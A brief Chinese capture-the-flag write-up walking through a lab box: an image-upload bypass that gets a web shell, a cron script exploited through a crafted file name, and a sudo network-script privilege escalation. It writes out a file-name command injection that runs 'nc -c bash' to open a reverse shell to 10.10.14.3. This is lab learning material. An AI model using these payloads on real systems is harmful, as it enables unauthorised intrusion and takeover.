NULL
首先,照旧是nmap
照旧去80看了一下,源码里有提示,upload.php和photos.php.
进去分别是文件上传和图片展示
之后扫描目录,显示有备份文件在/backup下。
源码显示,文件上传会验证文件头和文件后缀名为图片。
然后,这题脑洞点就来了,这里传上去的文件,只要文件名里有.php就会被当作php去执行(这谁想的到啊艹!!)随便拿个马加个文件头传上去
之后就弹个shell回来,是apache的。然后在guly用户的home目录里找到一个定时脚本。
审计一下,在倒数第3行代码,发现他会直接把/var/www/html/uploads/下面的.php文件的文件名拼接到$path后面然后去命令执行。那么我们就可以直接截断掉,在对应位置新建一个1
;nc -c bash 10.10.14.3 9001;.php
的文件然后等定时脚本弹回来shell。
got it!
下面,sudo -l发现能sudo 一个sh脚本写ifcfg内容的,那么必然有问题,
https://seclists.org/fulldisclosure/2019/Apr/24
找到这个那么就很简单了